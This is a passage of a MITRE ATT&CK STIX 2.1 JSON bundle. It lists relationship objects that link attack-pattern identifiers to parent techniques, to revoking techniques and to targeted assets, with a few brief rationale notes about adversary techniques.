"x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b69905bd-6865-4092-9543-47bd9ae318ec", "created": "2023-09-28T19:54:22.618Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:54:22.618Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6a3348c-99db-49d0-b98e-9bc80b4cef06", "created": "2020-02-05T19:34:05.080Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6ba4fa6-4b31-4824-9885-882274c62716", "created": "2020-10-12T13:52:32.923Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6c09dbf-0934-42c5-a517-847128a0ce5a", "created": "2020-10-01T01:08:41.201Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7064aad-995c-450f-b43d-f4bd2362d401", "created": "2020-02-05T20:09:23.055Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", "target_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7284360-0d80-45bb-8486-263ae8f8fa63", "created": "2023-09-28T21:26:01.106Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:26:01.106Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7344dfb-621b-4558-ab22-6c1f256ee746", "created": "2023-09-29T16:46:27.408Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:46:27.408Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b774fcb4-43bf-4ff1-98c6-0a94838eacc2", "created": "2023-09-29T18:57:10.064Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-28T03:07:43.715Z", "description": "Asset Mapping Rationale: ", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7a9bff5-2e15-4d3d-ac88-84af1239a586", "created": "2023-09-28T19:51:42.728Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:51:42.728Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7dc0db4-b1fb-4235-8b49-0792e7019377", "created": "2020-03-09T13:48:55.816Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7f99597-3cbb-4cc4-a0d5-1d2abd84dbea", "created": "2020-10-01T01:20:53.171Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b", "target_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b849b1ae-0b73-484c-9061-38ddf3cbdbb3", "created": "2020-03-15T16:21:45.240Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b84e1473-f370-42ad-ac3b-7caf3c8cd00e", "created": "2023-09-29T18:42:53.573Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:42:53.573Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b862605b-8ff9-4902-a95c-e13fe44ede03", "created": "2024-05-23T03:47:50.869Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:09:13.076Z", "description": "Asset Mapping Rationale: Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP). ", "relationship_type": "targets", "source_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b8894821-8f07-4385-955a-205f47ffe619", "created": "2021-03-17T20:32:13.870Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c071d8c1-3b3a-4f22-9407-ca4e96921069", "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b8d85cbc-a92e-4921-94bc-defa75becbf3", "created": "2020-03-23T15:40:51.089Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", "target_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba3d8bc0-a418-456c-9b4f-61a040208cf6", "created": "2020-01-10T16:01:16.205Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0", "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba496af3-2d99-4c2b-8ce0-20388f5d632c", "created": "2023-09-28T21:28:36.325Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:28:36.325Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba5e1994-4732-44a0-a266-452ca526df5a", "created": "2020-01-31T12:39:48.360Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--e7eab98d-ae11-4491-bd28-a53ba875865a", "target_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba943eeb-5673-44b5-acbf-1cddc2fefb1a", "created": "2023-09-28T20:03:54.209Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:03:54.209Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bab08287-699f-438d-aa69-f72cbac37ba3", "created": "2020-01-14T17:24:47.560Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--1c338d0f-a65e-4073-a5c1-c06878849f21", "target_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bab689ff-c89e-452f-bca6-a01078ae406e", "created": "2020-01-24T17:07:20.018Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79", "target_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bac1f95c-87bf-4939-bc1a-7727aad738f7", "created": "2023-09-29T18:49:34.208Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:49:34.208Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bad056aa-b8a6-4c4c-9bfa-bcc518872341", "created": "2024-03-25T20:17:36.433Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-25T20:17:36.433Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--baeaf95e-35be-44df-8e65-95480d066550", "created": "2021-10-08T14:06:28.307Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--baedd4b3-1fc9-4056-a282-322496a3cceb", "created": "2020-02-10T19:49:46.844Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bb1fb0c8-49f9-463c-b039-68636d507b80", "created": "2020-03-06T21:11:11.339Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bb20fdf4-f214-417a-b785-9c2c6f90722f", "created": "2022-03-28T15:34:44.696Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bb33e2e0-015c-42e9-a8b5-e1d3f1043e1f", "created": "2024-05-23T04:06:08.376Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:13:07.771Z", "description": "Asset Mapping Rationale: Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key.", "relationship_type": "targets", "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bb3938a6-85ec-4f34-8bcd-6051de7e9259", "created": "2023-09-29T16:45:08.209Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:45:08.209Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bb611cd0-6646-4090-82ea-96ca4440afb7", "created": "2020-12-18T16:33:13.341Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bb6f2e41-2f67-49e7-ade1-490abeb9274a", "created": "2021-04-23T01:04:57.258Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bbddae2e-69d5-4b4f-a091-42d12075e007", "created": "2020-03-14T22:34:03.218Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bbeb2eae-7da2-4477-ad8e-8c67b00c53bc", "created": "2023-09-28T19:53:44.848Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:53:44.848Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bbf33c27-569c-4005-b047-63b8ec4e6a22", "created": "2020-01-31T19:00:56.776Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bc3a0b1f-f0ec-466f-8cad-8f47b07764c9", "created": "2023-09-28T21:22:21.776Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:22:21.776Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bccb7ac3-c374-445b-aad2-14991a8641e5", "created": "2020-03-16T15:45:18.139Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bcdb80d6-8ae4-4283-8abd-e933b498be13", "created": "2020-02-11T18:26:02.003Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--ffe742ed-9100-4686-9e00-c331da544787", "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bced764f-e4f1-43d0-af3b-ae93d607041a", "created": "2020-03-16T15:23:31.073Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", "target_ref": 